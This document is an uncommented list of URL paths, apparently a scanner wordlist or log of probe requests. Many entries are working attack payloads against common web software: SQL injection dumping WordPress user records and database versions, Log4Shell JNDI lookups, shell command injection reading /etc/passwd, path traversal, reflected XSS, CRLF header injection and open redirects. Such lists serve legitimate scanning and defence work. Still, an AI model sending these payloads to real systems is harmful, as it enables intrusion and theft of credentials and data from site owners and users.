/web/%5cgoogle.com/evil.html
/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/web/?x=${jndi:ldap://${hostName}./a}
/web/?x=${jndi:ldap://127.0.0.1
/web/action.php
/web/auth/check
/web/auth/newpassword
/web/auth/requestreset
/web/cgi-bin/file_transfer.cgi
/web/cgi-bin/login?LD_DEBUG=files
/web/cgi-bin/slogin/login.py
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/confluence/pages/createpage-entervariables.action
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/en/php/usb_sync.php
/web/etc/passwd
/web/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/web/homeaction.php
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/lab.html?vpath=//example.com
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/OpenAM-11.0.0/ui/PWResetUserValidation
/web/openam/ui/PWResetUserValidation
/web/pages/createpage-entervariables.action
/web/pages/createpage-entervariables.action?SpaceKey=x
/web/pages/createpage.action?spaceKey=myproj
/web/pages/doenterpagevariables.action
/web/pages/templates2/viewpagetemplate.action
/web/plugins/weathermap/configs/poc.conf
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C
/web/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/web/scrm/crm/admin
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/sharedir.php
/web/template/custom/content-editor
/web/templates/editor-preload-container
/web/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0
/web/testing-put.txt
/web/tools.cgi
/web/ui/PWResetUserValidation
/web/users/user-dark-features
/web/wiki/pages/createpage-entervariables.action
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
